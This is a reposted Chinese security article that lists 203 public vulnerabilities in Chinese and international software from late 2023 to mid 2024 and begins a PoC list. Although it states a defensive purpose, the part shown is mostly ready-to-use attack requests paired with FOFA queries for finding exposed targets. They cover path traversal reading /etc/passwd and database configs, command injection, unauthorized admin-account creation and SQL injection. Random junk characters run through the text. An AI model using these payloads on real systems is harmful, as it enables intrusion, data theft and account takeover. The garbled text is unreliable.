互联网公开漏洞整理202309-202406( |9 Y+ H2 q. b9 W ?3 b
道一安全 2024-06-05 07:41 北京& F) Z7 C: y0 [* H( K7 Z2 l' W
以下文章来源于网络安全新视界 ,作者网络安全新视界
1 l4 u, }: p, d8 f5 C2 Q
6 n; Q% J9 b( [* M, h4 D发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
: X, G7 o/ l3 O- ?% M5 X+ c7 I, v( B0 g
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
. v1 C3 j- ?, j+ b5 u N
. z+ e7 I5 o4 h8 P7 t( X安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
' _, E3 v$ {; Z3 y a- ~
8 _( H: o. @, Q0 Z& Q文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。% T7 b) k! u7 N
$ W b3 r9 Z0 g
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
# x& ?7 t0 A- ~! x& S, Z' ?% a' V i6 o" W
& t6 f* U) @0 M7 I/ B声明! S6 b2 A" m6 h$ b% p
* l/ M4 d$ r2 q) j* q
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。 U8 i+ X; r# x8 U) h! ^
/ D5 W4 F i+ n x2 e, J2 m有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
5 F ~1 @8 h( j3 K7 J. \" n
O6 F! O5 X: z9 X$ m$ l. `" S2 n7 { S) o x& s
9 n4 z+ ?" F- J9 j7 ]6 y7 h! n目录
; J2 u4 b. v4 t" x! q: I4 R1 `: L |$ Y4 ~7 l3 B' \
01
( k8 C9 m. |8 D
4 Q" ]* s& B9 ^% j# D0 j1. StarRocks MPP数据库未授权访问
0 u. u7 D8 d- p# D$ k& q2. Casdoor系统static任意文件读取0 b p( y4 v0 l( c/ \, i9 C
3. EasyCVR智能边缘网关 userlist 信息泄漏# T; }: M4 B0 Z7 ?" L" g! E# [
4. EasyCVR视频管理平台存在任意用户添加
& f8 p( t# T) B+ F( b5. NUUO NVR 视频存储管理设备远程命令执行
5 v% o+ z+ ]. Z$ @6. 深信服 NGAF 任意文件读取
+ n% U$ A# e( |4 v4 [7 {! l7. 鸿运主动安全监控云平台任意文件下载
# T$ b1 H4 [& W* `; y8 l0 B( [. P8. 斐讯 Phicomm 路由器RCE
4 P: h; d8 P* t0 t- e/ {1 q: A9. 稻壳CMS keyword 未授权SQL注入/ y7 A! J; N1 c1 A$ l# _
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
: n {! c* ` I0 }/ T1 C, w; E11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入# u& m3 }6 g0 N. b' s* W0 g
12. Jorani < 1.0.2 远程命令执行" `! \1 O) M/ v0 w; D
13. 红帆iOffice ioFileDown任意文件读取; s( X, [ K. h' K/ a: F4 H# n
14. 华夏ERP(jshERP)敏感信息泄露
; u0 _( a. @! V$ ^" \15. 华夏ERP getAllList信息泄露. d* g2 v1 i8 [5 i( G2 ? |" j
16. 红帆HFOffice医微云SQL注入
# I6 l% k% K* A( G7 d' W" U17. 大华 DSS itcBulletin SQL 注入0 a1 Q: W `' F$ K6 m* \* l1 s
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
, W9 H( V9 l6 X5 i19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
6 E+ ~. v1 r* }5 s( p8 G20. 大华ICC智能物联综合管理平台任意文件读取- z! c' Z' n) L
21. 大华ICC智能物联综合管理平台random远程代码执行
& {2 @2 {+ c6 Y6 H3 X& P4 _) d22. 大华ICC智能物联综合管理平台 log4j远程代码执行
4 S; U3 t) c( Q23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
# U1 U1 A3 G/ R' a: c7 Z: \24. 用友NC 6.5 accept.jsp任意文件上传
+ s3 h3 I5 s: n; h% u) \4 Y25. 用友NC registerServlet JNDI 远程代码执行
9 q4 O' Q5 T, U( \, A J26. 用友NC linkVoucher SQL注入
3 }* E/ x9 h* c: W3 o( x+ P2 R27. 用友 NC showcontent SQL注入7 m1 N3 P! E; o6 q- j2 \" \
28. 用友NC grouptemplet 任意文件上传, F6 L7 D$ }# [6 |* B
29. 用友NC down/bill SQL注入
- i/ i2 A) j+ ~2 O$ R- ^+ k; p* P30. 用友NC importPml SQL注入
0 m) R9 |0 p/ c6 A' ^( ^31. 用友NC runStateServlet SQL注入8 b; |1 K5 l9 O a7 @' L# r
32. 用友NC complainbilldetail SQL注入
5 |8 {6 z* H8 j, Y3 Z4 n33. 用友NC downTax/download SQL注入
6 F4 j0 P# W/ D L34. 用友NC warningDetailInfo接口SQL注入
1 z8 T0 l" |' u35. 用友NC-Cloud importhttpscer任意文件上传
A1 {& Z% z- M: Z3 Z. Z36. 用友NC-Cloud soapFormat XXE
2 W; ?7 I0 a# S+ _1 p0 n37. 用友NC-Cloud IUpdateService XXE# q+ E* n' Q/ K. M1 m- `' l+ Q7 g
38. 用友U8 Cloud smartweb2.RPC.d XXE1 |7 ]0 a6 N9 C4 }* A
39. 用友U8 Cloud RegisterServlet SQL注入, _" B: U0 {: r8 z2 p
40. 用友U8-Cloud XChangeServlet XXE+ {2 g8 z7 k3 d8 A' I
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
) [9 \9 ?# {0 {4 j42. 用友GRP-U8 SmartUpload01 文件上传
+ `1 J. o- j4 j: ?4 N4 V43. 用友GRP-U8 userInfoWeb SQL注入致RCE& d7 b8 {8 y% F3 [
44. 用友GRP-U8 bx_dj_check.jsp SQL注入: {% Q0 [7 `' O M
45. 用友GRP-U8 ufgovbank XXE
0 `; f- v3 f& t- c F46. 用友GRP-U8 sqcxIndex.jsp SQL注入6 e* y# {* B |: O6 z8 Y0 X
47. 用友GRP A++Cloud 政府财务云 任意文件读取
% g0 Z$ N( p* |9 E" A& S# p48. 用友U8 CRM swfupload 任意文件上传
7 \. c- w% |. v8 I7 D+ C49. 用友U8 CRM系统uploadfile.php接口任意文件上传
( d5 Y* q2 K, W& ^9 q50. QDocs Smart School 6.4.1 filterRecords SQL注入7 i0 X8 s8 o9 d4 R8 e+ O' I
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, }; {" T2 L$ X$ w3 H
52. 泛微E-Office json_common.php sql注入
( g' ]0 c3 \; u53. 迪普 DPTech VPN Service 任意文件上传3 [6 ^' T* f" B8 t* ?
54. 畅捷通T+ getstorewarehousebystore 远程代码执行* w$ j1 T( K/ c* a0 a" j& F! ^3 D
55. 畅捷通T+ getdecallusers信息泄露
% B( Y% c- r" W/ X. S9 w! A, ]4 c56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE( \7 V, u3 Y# l a' X' A
57. 畅捷通T+ keyEdit.aspx SQL注入
. U; ?; L M* p7 W58. 畅捷通T+ KeyInfoList.aspx sql注入
& w6 I7 s0 s) @& V59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
! L, } o/ H. x! D- I' ^60. 百卓Smart管理平台 importexport.php SQL注入7 A5 ~: N3 j' ~2 I6 d
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
. p# k# g8 [# T7 e62. IP-guard WebServer 远程命令执行
" T! p# i& K7 a0 Q ^/ W& g63. IP-guard WebServer任意文件读取
' R$ G. ^% [6 n1 D7 p$ x64. 捷诚管理信息系统CWSFinanceCommon SQL注入
: J u1 w+ U l+ z65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
- K: V3 J# Q9 T3 h/ ]% j) z; Q66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
* u0 g8 x* I% A4 @1 {' z67. 万户ezOFFICE wpsservlet任意文件上传
' f& ^ j/ H& \/ O2 B5 z& {1 Q68. 万户ezOFFICE wf_printnum.jsp SQL注入
) O2 T& w& g' ]2 N$ _7 {69. 万户 ezOFFICE contract_gd.jsp SQL注入# x6 x0 Y; ^* }/ J: c+ x L. O c
70. 万户ezEIP success 命令执行
3 ^5 I1 N7 B" V7 q0 H W. F71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入/ G9 K3 m$ a8 D$ E2 u! V& r
72. 致远OA getAjaxDataServlet XXE
+ V4 I- O/ C' R73. GeoServer wms远程代码执行4 ~# r. Y* \6 d* S# W* b. T
74. 致远M3-server 6_1sp1 反序列化RCE4 N$ t k, r. W4 {5 E) @
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE9 | |& Y% i7 Y/ r
76. 新开普掌上校园服务管理平台service.action远程命令执行
4 T) `$ Q. R. S: E7 H77. F22服装管理软件系统UploadHandler.ashx任意文件上传! v& E0 b2 r) {. x$ k. Y
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传/ e* ]+ C' ]& U6 C8 n
79. BYTEVALUE 百为流控路由器远程命令执行$ H% ~' D4 m' C+ u
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传$ z: z) I- p5 R8 \4 H8 [4 Z
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露- Q' g6 z( O4 y% B R2 x; K
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行6 \% i0 _# W* t X+ e: S* |4 j
83. JeecgBoot testConnection 远程命令执行1 e% E9 D c2 [1 }" \/ I: M
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入0 c2 }1 ^2 a( u' e" R {: p
85. SysAid On-premise< 23.3.36远程代码执行
% r; Y) v8 `. J- l7 b86. 日本tosei自助洗衣机RCE* e" c8 a5 u' C
87. 安恒明御安全网关aaa_local_web_preview文件上传
- m! N) [6 x, w' z& x; U88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
& f5 `# B! c3 H9 e+ d89. 致远互联FE协作办公平台editflow_manager存在sql注入) o2 y" x$ s- o
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
! i8 S* x8 W2 {" R) @91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取/ b8 D: D9 O; M* E) D
92. 海康威视运行管理中心session命令执行
. A, w, j( |; ^4 F93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
4 q/ S+ w; m& a4 [) t/ J H( d4 v94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
) X4 D! C: }' b. `4 b3 }3 i95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行5 C' D# |4 k/ X$ Y
96. Apache OFBiz 18.12.11 groovy 远程代码执行
, i) H# N. b& H! q- Z |/ V97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行1 Y3 y$ L0 r- I% a6 P
98. SpiderFlow爬虫平台远程命令执行% f- P1 W/ q' A2 {" z9 |
99. Ncast盈可视高清智能录播系统busiFacade RCE
0 R1 Y% T+ J- ^. L, ^100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
3 h* H1 _+ f# u# K101. ivanti policy secure-22.6命令注入: D3 Q; T1 Q) X" a! M* L6 M/ Y
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行0 f. C; y/ M4 |! Z# |/ w( z' m
103. Ivanti Pulse Connect Secure VPN XXE
. S) c! u3 }2 e5 ?6 z# B) f8 L104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
' u, d. f6 g" {7 E4 f1 D105. SpringBlade v3.2.0 export-user SQL 注入) A0 C3 K& X% m& T* @0 i! o
106. SpringBlade dict-biz/list SQL 注入" A6 P/ Q6 S/ X1 G
107. SpringBlade tenant/list SQL 注入# E! |; Z8 k6 z( w
108. D-Tale 3.9.0 SSRF
7 i( e9 ]2 b" F! t( Y& H109. Jenkins CLI 任意文件读取
$ \3 e) _( ?" j- H. d4 h110. Goanywhere MFT 未授权创建管理员0 r3 z& v1 g/ V$ E* H% i$ ]8 q
111. WordPress Plugin HTML5 Video Player SQL注入$ N; {* X4 {5 B d3 Z- }4 X
112. WordPress Plugin NotificationX SQL 注入; n; k7 Q5 j# K0 N5 `
113. WordPress Automatic 插件任意文件下载和SSRF
* K ?4 X* a) v" P* P$ B114. WordPress MasterStudy LMS插件 SQL注入4 J; R6 j% o0 k6 C. n
115. WordPress Bricks Builder <= 1.9.6 RCE* l& y- w Y- n% h/ z
116. wordpress js-support-ticket文件上传0 c9 T5 e0 d% `5 J3 t7 g
117. WordPress LayerSlider插件SQL注入( q( t+ S9 r) f) b! P
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传" q( \4 ]5 w& ]2 [% M
119. 北京百绰智能S20后台sysmanageajax.php sql注入
0 @% S9 k6 c l% y& ^* e& Q. X120. 北京百绰智能S40管理平台导入web.php任意文件上传
1 s, Z! j( h' n. a121. 北京百绰智能S42管理平台userattestation.php任意文件上传
0 I6 r7 t; X- N! A! i" B! I122. 北京百绰智能s200管理平台/importexport.php sql注入
. ^% q% k1 x0 `" S# p' b; m; i& ?123. Atlassian Confluence 模板注入代码执行" Y$ Z8 x- X3 y6 s6 G
124. 湖南建研工程质量检测系统任意文件上传
/ I* R- c: t$ f0 y, p8 C! Y125. ConnectWise ScreenConnect身份验证绕过( {5 W4 V1 n6 `, M3 N& }; a- x
126. Aiohttp 路径遍历( u8 B" j1 N* Y" U7 {
127. 广联达Linkworks DataExchange.ashx XXE
! w1 y& p+ |! F/ x9 u128. Adobe ColdFusion 反序列化" d0 [0 w8 u. J+ i) n" }
129. Adobe ColdFusion 任意文件读取# E6 @- L# U R: M# \8 Y' y
130. Laykefu客服系统任意文件上传' Y v2 X7 @ ~" d0 [
131. Mini-Tmall <=20231017 SQL注入' P1 u3 s/ u: n
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
* {4 ?% x& [" |133. H5 云商城 file.php 文件上传
& p, R) o% [8 l# U m5 E5 F4 T" M134. 网康NS-ASG应用安全网关index.php sql注入3 z4 m) m; E0 e( |- ?- @
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
" i& Y4 G$ Z: c136. NextChat cors SSRF
2 O! H4 s! r8 D/ d# l" j137. 福建科立迅通信指挥调度平台down_file.php sql注入! r# R: z h# D1 Q+ @
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
5 X9 o0 J" O. i# B139. 福建科立讯通信指挥调度平台editemedia.php sql注入
" K" }7 {* ~! o/ W, H7 Y, h* e1 D140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入* C2 b: y) e4 z {' v" w" e
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
0 o3 [' K( s8 g142. CMSV6车辆监控平台系统中存在弱密码
( U% o& E& X+ P3 a143. Netis WF2780 v2.1.40144 远程命令执行+ A2 w, }* I( C9 Y2 N- Q
144. D-Link nas_sharing.cgi 命令注入
# F# x! ?. Z! o145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
6 G: Z& p& j+ n7 N$ v. {- l146. MajorDoMo thumb.php 未授权远程代码执行
! v5 D" c( D6 m0 u9 R0 x) ~. R147. RaidenMAILD邮件服务器v.4.9.4-路径遍历7 N K; M3 i8 M% z/ x
148. CrushFTP 认证绕过模板注入
. T( j$ m e9 m4 c" l" ]149. AJ-Report开源数据大屏存在远程命令执行
. S% E' d/ | {150. AJ-Report 1.4.0 认证绕过与远程代码执行
' ^) N. k& |) Y, z& y( D4 h151. AJ-Report 1.4.1 pageList sql注入+ T& Q+ d- E% n0 W
152. Progress Kemp LoadMaster 远程命令执行
2 A% g" T0 i+ G) T! r153. gradio任意文件读取. R2 g* i4 @+ ^$ Q4 Q. I
154. 天维尔消防救援作战调度平台 SQL注入0 P0 G5 O7 _& Y8 c5 r! f; U8 |
155. 六零导航页 file.php 任意文件上传
8 l$ V$ y! y+ u$ I" \; M& O156. TBK DVR-4104/DVR-4216 操作系统命令注入
, [5 h2 J9 [6 q, U/ y, h9 F1 K, i157. 美特CRM upload.jsp 任意文件上传9 a d/ x. z6 B* Y4 g* l3 J: c
158. Mura-CMS-processAsyncObject存在SQL注入
# w# ?" A/ d, G159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传% M: q# p0 F% o S- ^ e$ ^+ K
160. Sonatype Nexus Repository 3目录遍历与文件读取+ |: ]) o: ~8 e6 D; N
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
: m) R6 p1 s; C$ S162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传1 B) Z1 H& q* d* l% T3 D
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
; x. p: F6 u- u, L" x& ]% H164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
3 R! b! [* v8 X, O: D9 ]165. OrangeHRM 3.3.3 SQL 注入+ b* j& n' ]% J& y M* }
166. 中成科信票务管理平台SeatMapHandler SQL注入1 ]& r- ^& G8 p, M) ?/ Y$ i8 N7 ]
167. 精益价值管理系统 DownLoad.aspx任意文件读取
0 b6 A! Z. z5 i. ?1 T& y168. 宏景EHR OutputCode 任意文件读取
5 |; O) P) x" X2 A; o: I# e& Q" s169. 宏景EHR downlawbase SQL注入- [1 e6 }& N. }( B2 A4 x
170. 宏景EHR DisplayExcelCustomReport 任意文件读取% m6 x% a: I& i5 [
171. 通天星CMSV6车载定位监控平台 SQL注入
) x5 [+ H. ^: u1 Q" u# c: F172. DT-高清车牌识别摄像机任意文件读取
# @2 ]3 L6 p& O* p# S c173. Check Point 安全网关任意文件读取% H+ |8 R2 o$ s5 q+ t) l% ^
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
- s c* V; ~- M# c175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入+ m! Y9 E( l) G( q
176. 电信网关配置管理系统 rewrite.php 文件上传
+ J& @. A, y1 N" X177. H3C路由器敏感信息泄露
; V% a! y8 _: f% Y$ t# ]178. H3C校园网自助服务系统-flexfileupload-任意文件上传$ Y, Q: V1 Y" Q7 k& D" u
179. 建文工程管理系统存在任意文件读取
) Z2 Y7 a5 x1 R: `) V" }( Q180. 帮管客 CRM jiliyu SQL注入8 c2 P* ^: S$ k: n2 M" I- F
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入 ]6 U7 u6 j" l" m# N' {' C8 o* r
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
0 b' J- \6 G! j) n( B- d183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
7 t2 q0 n3 J c$ ?184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加% H: e9 i( D! G
185. 瑞友天翼应用虚拟化系统SQL注入2 k' }7 I* y4 I9 H# W1 L# F4 b
186. F-logic DataCube3 SQL注入3 C6 u/ Y1 W! R& n
187. Mura CMS processAsyncObject SQL注入
4 Q0 M3 j4 z/ [* O3 w( c7 |. H6 f188. 叁体-佳会视频会议 attachment 任意文件读取
3 n/ o7 L( P8 A% U5 F0 N# q189. 蓝网科技临床浏览系统 deleteStudy SQL注入
. K6 G/ q. G" [: J1 T3 v190. 短视频矩阵营销系统 poihuoqu 任意文件读取
! p0 k; T! z/ K4 R191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入3 G0 F. v O8 M% Y5 ^
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
9 x" a9 d: @# W; P4 m1 Y& w( I, B9 K193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行0 A5 A( w$ P) j) m9 ~
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传1 `- N4 ^8 g- c/ L9 A6 G0 |7 x# _2 k
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行" |7 C9 f+ u- S0 p1 i. Z
196. 河南省风速科技统一认证平台密码重置
2 T7 M! j! W q2 `! G& x197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入4 T& I9 D" E! d1 S$ g
198. 阿里云盘 WebDAV 命令注入
5 B: z8 [" G/ D; E199. cockpit系统assetsmanager_upload接口 文件上传
: Y- s* K: m" D8 Q( i& R$ ^200. SeaCMS海洋影视管理系统dmku SQL注入1 `$ Q! G1 ^! x5 a
201. 方正全媒体新闻采编系统 binary SQL注入! q y5 n1 Z; p# C3 h# T
202. 微擎系统 AccountEdit任意文件上传4 |3 {0 N6 D$ o. n. d! v
203. 红海云EHR PtFjk 文件上传
. g/ c4 h8 d" Z$ S5 j2 N& q; |1 ?% r6 F9 I3 N
POC列表1 s/ I. W/ Q$ U' b1 K6 N% H
5 W/ m# R7 I$ w
02
% v% }$ r7 D) ?% j/ @: }: V
8 U6 ~4 h' e" d1. StarRocks MPP数据库未授权访问
& I* [* H5 b$ H) }" M- eFOFA :title="StarRocks"; K- m# h! f8 v% X! N
GET /mem_tracker HTTP/1.1* C/ c) d$ D- L; }( w" x
Host: URL
$ e, n7 W! m0 x: ~( |+ t, F7 [/ {" K6 D" F
- i X& h1 ^6 Q/ Z$ U2 k% ^
2. Casdoor系统static任意文件读取. Z% ?' T2 x( s5 M0 B4 h, D& A
FOFA :title="Casdoor". @" q- n2 N) K% b# m" q" Y
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1. i6 S" j G4 L4 d
Host: xx.xx.xx.xx:9999
( O1 w! l+ {% @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) m+ i( {' I6 u7 z
Connection: close
8 E( Y; u9 d# k+ L, \Accept: */*
9 v/ b" i3 j' [2 G: p1 h. ?Accept-Language: en
" h5 \: j, O& s/ `Accept-Encoding: gzip# z5 ^% f6 k( L6 I3 }
5 Y6 S7 b t8 m! w9 x: o3 N
, c5 F6 T1 u) u# N( {& l1 Q, O5 t3. EasyCVR智能边缘网关 userlist 信息泄漏" n( n- k0 U/ R- u
FOFA :title="EasyCVR"1 s( a t% y% d. l5 |- m
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1! S* P5 O) z7 O( [
Host: xx.xx.xx.xx- G+ B# N: ~% Q7 Q
$ @" |0 B, _, A1 ]8 y: C, I, z8 L" \4 I
4. EasyCVR视频管理平台存在任意用户添加
) V( \7 k* A sFOFA :title="EasyCVR"5 r6 X- i, p. Q( m' x
# T& n( Q* T6 ~8 v+ n) b4 g
password更改为自己的密码md5
( s1 q" i `9 G( N7 H( c# VPOST /api/v1/adduser HTTP/1.12 _7 V& l4 y9 [' Q/ I. I
Host: your-ip8 K+ F( g1 m/ Y! y' M! h# Z
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
; _$ m$ d* _( v' {9 F/ j4 Q4 I: H& i! K2 Q [0 R* _$ d
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
8 G2 r: ^; z8 |
5 H) K. |9 R) q$ \: G3 G5 r
# f i$ W+ y5 ^5. NUUO NVR 视频存储管理设备远程命令执行8 {, k; E" S1 X' Y' a
FOFA:title="Network Video Recorder Login"+ [! S& l" g: Z9 e
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.15 i0 @+ K# f& q
Host: xx.xx.xx.xx- u0 E9 M2 O, \) U+ C" F
3 x& \& B2 R5 y, ]: h
. A3 b) T9 ]1 N' t7 b) c9 u
6. 深信服 NGAF 任意文件读取1 z k1 Q% c, q" w n9 l. d8 e
FOFA:title="SANGFOR | NGAF". C$ F5 p( a/ Z& f7 P+ M. e
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1. l7 \4 a! ~, s X
Host:
# r! ?1 o4 W4 ?& e& R: i& Z
7 Y! p% i5 H R4 L+ O( i
/ u( O A5 S/ E7. 鸿运主动安全监控云平台任意文件下载
w) c& Q+ p( `FOFA:body="./open/webApi.html"
$ m2 D9 @. O% e7 e# S" @0 d+ r- xGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.18 }! w+ F: r; Z) P
Host:) p+ T0 L; y/ b' r R
0 _: ]0 e/ P/ q$ o P! H' F% I, _: B0 j. y% D% X
8. 斐讯 Phicomm 路由器RCE5 g; h9 o5 h; n r/ W
FOFA:icon_hash="-1344736688"
) W0 s4 M3 x* F4 U; B默认账号admin登录后台后,执行操作
7 O" A7 n& D. ]' u" F' ]) g5 zPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
( t) [0 A ?, U" f& ~Host: x.x.x.x. e! o3 R5 Q/ ?. Q/ n! b q
Cookie: sysauth=第一步登录获取的cookie t* `# z$ N4 Q5 C" k. a( b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz0 _8 b/ }4 E7 [( U( b/ G: w6 ~
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" h h5 z! X0 z; C: i) D% z: d+ X$ t3 V/ ^( T
------WebKitFormBoundaryxbgjoytz/ @" f' U/ _. D/ A
Content-Disposition: form-data; name="wifiRebootEnablestatus"
; c" d% w7 S S* p: Z. h/ X4 P3 _/ d4 s f) z j
%s- p+ ?: V( |6 F* m9 Q
------WebKitFormBoundaryxbgjoytz
. v6 W* L5 \4 Y. J) ^9 H! z& CContent-Disposition: form-data; name="wifiRebootrange") u$ g8 G4 r ]* F
( f/ I% X- j# P12:00; id;
" I D9 ~3 m1 y" K0 C, N------WebKitFormBoundaryxbgjoytz* x1 V3 D% |: S w
Content-Disposition: form-data; name="wifiRebootendrange"
) I/ M4 {( Y0 V5 k% T$ Z
: y7 m' r# K! Y6 C" m%s:! ]2 u9 ^6 q! u- n6 Q
------WebKitFormBoundaryxbgjoytz
2 e$ u! d* k0 R V8 b# mContent-Disposition: form-data; name="cururl2"3 c3 o* C. G& s8 `
0 @6 i9 m4 ]/ o1 ^# c# p+ l( j" |
" Z7 F: o& Q* k, q3 G. |
------WebKitFormBoundaryxbgjoytz--
8 D0 F, j8 E% @$ B7 k) S/ I3 r4 X
4 S$ ]7 v3 S' q! d* S! }& p9 s- {) |4 I2 J
9. 稻壳CMS keyword 未授权SQL注入5 N U3 ^3 W2 r
FOFA:app="Doccms"8 v4 k1 x3 {6 Y1 i+ w* w; L
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
" {$ m* g5 C1 L' _$ `8 J1 I! zHost: x.x.x.x9 [3 \1 H. [" a, c+ x
/ k8 R; _# X' b- S. h$ l
/ z. _$ F9 _8 R' W" Spayload为下列语句的二次Url编码% x, L" S) I( _1 E5 ~4 u% |5 H# ~
. }- b! n3 V3 _. f- F- n' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
2 K$ a Z) n! N0 [) ?
( _( C7 n2 s. G- O$ r2 }6 F10. 蓝凌EIS智慧协同平台api.aspx任意文件上传. B: p9 V8 a( r, y' O
FOFA:icon_hash="953405444"
7 P, U+ l0 u/ g: _' \
: T* m x, N- F# c' J文件上传后响应中包含上传文件的路径' f% H2 Y6 y( j H# J
POST /eis/service/api.aspx?action=saveImg HTTP/1.1/ k5 A2 T# O* o/ F+ w- t
Host: x.x.x.x:xx' ?2 H* G* @/ q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
1 S& C& m, Y' n6 H. S x! ZContent-Length: 197
% h- i; t& X( t8 [0 J8 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- d; b( g) u ^9 U7 y: v
Accept-Encoding: gzip, deflate6 P5 S4 k& }; m) S. @. H" c: d
Accept-Language: zh-CN,zh;q=0.97 |9 \& c3 L9 m% C& ^
Connection: close
# a/ v/ X0 W, y$ O# D YContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu, Z: r) H2 \7 U3 x0 B
6 ?2 G M/ [8 e4 M& [) f8 j; A2 @
------WebKitFormBoundaryxdgaqmqu% F. g( M$ ?/ t. H& u) b0 D) }; d$ M4 S+ W
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
8 o, w9 o, J% _- D$ M, MContent-Type: text/html
8 {$ S5 Y. J2 u8 Z S4 j
" _; b5 A2 j. J- kjmnqjfdsupxgfidopeixbgsxbf
5 ~5 q! _3 r& j! J* |4 y9 O------WebKitFormBoundaryxdgaqmqu--: z# j# V7 I" h; r( r5 G1 a6 B
+ O; J9 w( b# ^% ] V$ K
* }0 q8 V f4 _- Z11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
: | a: w0 l0 P' vFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
( L7 _% y! z. E! Z6 dGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
/ X# y- H4 y) R, Q* jHost: 127.0.0.1
